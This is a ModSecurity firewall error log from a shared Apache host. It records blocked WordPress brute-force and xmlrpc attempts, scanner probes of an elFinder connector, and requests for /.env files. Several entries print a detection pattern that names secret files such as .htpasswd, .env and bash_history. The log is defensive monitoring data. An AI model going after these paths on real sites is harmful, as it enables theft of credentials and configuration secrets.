[Tue May 26 13:41:36.251376 2026] [security2:error] [pid 544395:tid 544618] [client 129.222.147.134:29343] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVuBmrs7g3RMCdp8XSxAAAAF0"]
[Tue May 26 13:41:37.370879 2026] [security2:error] [pid 544395:tid 544639] [client 106.192.248.115:49414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVuRmrs7g3RMCdp8XS4QAAAHI"]
[Tue May 26 13:41:37.371002 2026] [security2:error] [pid 544395:tid 544639] [client 106.192.248.115:49414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVuRmrs7g3RMCdp8XS4QAAAHI"]
[Tue May 26 13:41:38.157142 2026] [security2:error] [pid 544395:tid 544527] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVuRmrs7g3RMCdp8XS6wAAAAI"]
[Tue May 26 13:41:38.403850 2026] [security2:error] [pid 544395:tid 544583] [client 185.192.162.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVuRmrs7g3RMCdp8XS8AAAADo"]
[Tue May 26 13:41:39.935081 2026] [security2:error] [pid 544395:tid 544528] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVuxmrs7g3RMCdp8XTEQAAAAM"]
[Tue May 26 13:41:41.771339 2026] [security2:error] [pid 536875:tid 536878] [remote 103.50.205.131:40620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVVver_-FTveSGlx1HxfAAAhQI"]
[Tue May 26 13:41:41.828713 2026] [security2:error] [pid 536875:tid 537109] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVver_-FTveSGlx1HxewAAAO0"]
[Tue May 26 13:41:42.465830 2026] [security2:error] [pid 536875:tid 537092] [client 114.119.134.192:65285] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/homepages/blog-minimal/page/4"] [unique_id "ahVVvur_-FTveSGlx1HxhQAAANw"], referer: https://rongbay.com/external_link.html?url=http%3A//www.hindinuskhe.in
[Tue May 26 13:41:43.110425 2026] [security2:error] [pid 536875:tid 536880] [remote 217.112.89.35:60584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVVvur_-FTveSGlx1HxjQAAnwQ"]
[Tue May 26 13:41:43.748061 2026] [security2:error] [pid 536875:tid 537125] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVv-r_-FTveSGlx1HxmQAAAP0"]
[Tue May 26 13:41:45.141037 2026] [security2:error] [pid 536875:tid 537132] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVwOr_-FTveSGlx1HxpgAAAQQ"]
[Tue May 26 13:41:46.469897 2026] [security2:error] [pid 544395:tid 544641] [client 129.222.147.134:38288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVwhmrs7g3RMCdp8XTeQAAAHQ"]
[Tue May 26 13:41:46.477729 2026] [security2:error] [pid 544395:tid 544641] [client 129.222.147.134:38288] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVwhmrs7g3RMCdp8XTeQAAAHQ"]
[Tue May 26 13:41:46.634236 2026] [security2:error] [pid 536875:tid 537097] [client 176.65.139.231:32230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gbogbonise.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVVwur_-FTveSGlx1HxvQAAAOE"]
[Tue May 26 13:41:47.670696 2026] [security2:error] [pid 536875:tid 537031] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVw-r_-FTveSGlx1HxzAAAAJ8"]
[Tue May 26 13:41:47.673686 2026] [security2:error] [pid 544395:tid 544619] [client 106.192.248.115:49736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVwxmrs7g3RMCdp8XTgwAAAF4"]
[Tue May 26 13:41:47.673782 2026] [security2:error] [pid 544395:tid 544619] [client 106.192.248.115:49736] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVwxmrs7g3RMCdp8XTgwAAAF4"]
[Tue May 26 13:41:48.049429 2026] [security2:error] [pid 544395:tid 544616] [client 107.152.47.63:60593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.47.152.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVwxmrs7g3RMCdp8XThwAAAFs"], referer: https://www.cagmedya.com/web-tasarim-projelerinde-etkili-proje-yonetimi/
[Tue May 26 13:41:48.049552 2026] [security2:error] [pid 544395:tid 544616] [client 107.152.47.63:60593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVwxmrs7g3RMCdp8XThwAAAFs"], referer: https://www.cagmedya.com/web-tasarim-projelerinde-etkili-proje-yonetimi/
[Tue May 26 13:41:48.489942 2026] [security2:error] [pid 544395:tid 544573] [client 107.152.47.63:60615] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVxBmrs7g3RMCdp8XTlAAAADA"], referer: https://www.cagmedya.com/web-tasarim-projelerinde-etkili-proje-yonetimi/
[Tue May 26 13:41:48.782140 2026] [security2:error] [pid 544395:tid 544554] [client 114.119.155.55:47355] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/hizmetler/sosyal-medya"] [unique_id "ahVVxBmrs7g3RMCdp8XTpAAAAB0"], referer: https://www.cagmedya.com/hizmetler/sosyal-medya
[Tue May 26 13:41:49.682776 2026] [security2:error] [pid 544395:tid 544537] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVxRmrs7g3RMCdp8XTrgAAAAw"]
[Tue May 26 13:41:49.817831 2026] [security2:error] [pid 536875:tid 536910] [remote 111.229.10.83:33174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVVxer_-FTveSGlx1Hx5AAA4CI"]
[Tue May 26 13:41:50.578813 2026] [ssl:error] [pid 544395:tid 544641] [client 66.132.186.179:37288] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname billing.mosykay.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:41:51.565448 2026] [security2:error] [pid 544395:tid 544550] [client 64.89.161.160:58358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahVVxxmrs7g3RMCdp8XT5AAAABk"]
[Tue May 26 13:41:51.912828 2026] [security2:error] [pid 544395:tid 544460] [remote 57.141.2.50:62943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVVxxmrs7g3RMCdp8XT9QAAX0A"]
[Tue May 26 13:41:52.138409 2026] [security2:error] [pid 544395:tid 544541] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVxxmrs7g3RMCdp8XT8QAAABA"]
[Tue May 26 13:41:52.910996 2026] [security2:error] [pid 544395:tid 544588] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVyBmrs7g3RMCdp8XUCgAAAD8"]
[Tue May 26 13:41:55.427118 2026] [security2:error] [pid 536875:tid 537127] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVyur_-FTveSGlx1HyGQAAAP8"]
[Tue May 26 13:41:56.976869 2026] [security2:error] [pid 544395:tid 544588] [client 129.222.147.134:27858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVzBmrs7g3RMCdp8XUVwAAAD8"]
[Tue May 26 13:41:56.977057 2026] [security2:error] [pid 544395:tid 544588] [client 129.222.147.134:27858] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVzBmrs7g3RMCdp8XUVwAAAD8"]
[Tue May 26 13:41:57.100307 2026] [security2:error] [pid 536875:tid 537072] [client 173.239.240.40:22597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVVzOr_-FTveSGlx1HyLAAAAMg"]
[Tue May 26 13:41:57.172442 2026] [security2:error] [pid 536875:tid 537024] [client 173.239.240.50:22029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVVzOr_-FTveSGlx1HyLgAAAJg"]
[Tue May 26 13:41:57.196708 2026] [security2:error] [pid 536875:tid 537090] [client 173.239.240.59:24357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 59.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVVzOr_-FTveSGlx1HyKwAAANo"]
[Tue May 26 13:41:57.250588 2026] [security2:error] [pid 544395:tid 544494] [remote 172.104.164.56:56744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVVzRmrs7g3RMCdp8XUYwAAdGI"]
[Tue May 26 13:41:57.354983 2026] [security2:error] [pid 536875:tid 537095] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVzOr_-FTveSGlx1HyLQAAAN8"]
[Tue May 26 13:41:58.125994 2026] [security2:error] [pid 544395:tid 544538] [client 106.192.248.115:50045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVzhmrs7g3RMCdp8XUbQAAAA0"]
[Tue May 26 13:41:58.126186 2026] [security2:error] [pid 544395:tid 544538] [client 106.192.248.115:50045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVzhmrs7g3RMCdp8XUbQAAAA0"]
[Tue May 26 13:41:59.163386 2026] [security2:error] [pid 536875:tid 537044] [client 14.163.181.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVzur_-FTveSGlx1HyRgAAAKw"]
[Tue May 26 13:41:59.208879 2026] [security2:error] [pid 536875:tid 537023] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVzur_-FTveSGlx1HySQAAAJc"]
[Tue May 26 13:42:00.582592 2026] [security2:error] [pid 544395:tid 544615] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV0Bmrs7g3RMCdp8XUgQAAAFo"]
[Tue May 26 13:42:01.741708 2026] [security2:error] [pid 544395:tid 544531] [client 64.89.161.160:50265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "wrapmachines.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahVV0Rmrs7g3RMCdp8XUkgAAAAY"]
[Tue May 26 13:42:03.170733 2026] [security2:error] [pid 544395:tid 544633] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV0hmrs7g3RMCdp8XUpgAAAGw"]
[Tue May 26 13:42:04.144942 2026] [security2:error] [pid 536875:tid 537077] [client 49.13.164.148:60140] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVV1Or_-FTveSGlx1HyjAAAAM0"], referer: https://thegoodsporting.com
[Tue May 26 13:42:05.043155 2026] [security2:error] [pid 544395:tid 544601] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV1Bmrs7g3RMCdp8XUxQAAAEw"]
[Tue May 26 13:42:06.975048 2026] [security2:error] [pid 544395:tid 544467] [remote 85.215.36.85:34014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.36.215.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVV1hmrs7g3RMCdp8XU5QAAX0c"]
[Tue May 26 13:42:07.052654 2026] [security2:error] [pid 544395:tid 544644] [client 129.222.147.134:46606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV1xmrs7g3RMCdp8XU6AAAAHc"]
[Tue May 26 13:42:07.056332 2026] [security2:error] [pid 544395:tid 544644] [client 129.222.147.134:46606] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV1xmrs7g3RMCdp8XU6AAAAHc"]
[Tue May 26 13:42:07.091213 2026] [security2:error] [pid 544395:tid 544556] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV1hmrs7g3RMCdp8XU5AAAAB8"]
[Tue May 26 13:42:08.433174 2026] [security2:error] [pid 544395:tid 544569] [client 106.192.248.115:50353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV2Bmrs7g3RMCdp8XU_gAAACw"]
[Tue May 26 13:42:08.433277 2026] [security2:error] [pid 544395:tid 544569] [client 106.192.248.115:50353] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV2Bmrs7g3RMCdp8XU_gAAACw"]
[Tue May 26 13:42:08.854543 2026] [security2:error] [pid 544395:tid 544648] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV2Bmrs7g3RMCdp8XU_wAAAHs"]
[Tue May 26 13:42:10.292055 2026] [security2:error] [pid 536875:tid 537087] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV2er_-FTveSGlx1HywgAAANc"]
[Tue May 26 13:42:11.419553 2026] [security2:error] [pid 544395:tid 544547] [client 114.119.157.231:33269] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "srsglobalsoft.com"] [uri "/robots.txt"] [unique_id "ahVV2xmrs7g3RMCdp8XVMQAAABY"]
[Tue May 26 13:42:12.933020 2026] [security2:error] [pid 544395:tid 544607] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV3Bmrs7g3RMCdp8XVQgAAAFI"]
[Tue May 26 13:42:14.622909 2026] [security2:error] [pid 544395:tid 544474] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env"] [unique_id "ahVV3hmrs7g3RMCdp8XVaAAAZk4"]
[Tue May 26 13:42:14.669564 2026] [security2:error] [pid 544395:tid 544562] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV3hmrs7g3RMCdp8XVVwAAACU"]
[Tue May 26 13:42:16.683763 2026] [security2:error] [pid 536875:tid 537026] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV4Or_-FTveSGlx1HzEgAAAJo"]
[Tue May 26 13:42:17.348178 2026] [security2:error] [pid 536875:tid 537094] [client 129.222.147.134:19993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV4er_-FTveSGlx1HzJQAAAN4"]
[Tue May 26 13:42:17.356909 2026] [security2:error] [pid 536875:tid 537094] [client 129.222.147.134:19993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV4er_-FTveSGlx1HzJQAAAN4"]
[Tue May 26 13:42:17.435913 2026] [ssl:error] [pid 536875:tid 537066] [client 98.84.1.175:53753] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname webmail.holix.ktmadvance-senegal.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:42:18.089905 2026] [authz_core:error] [pid 536875:tid 537096] [client 176.65.139.235:29582] AH01630: client denied by server configuration: /home2/azurm42s/public_html/ipji-app.azurmediatec.com/.env
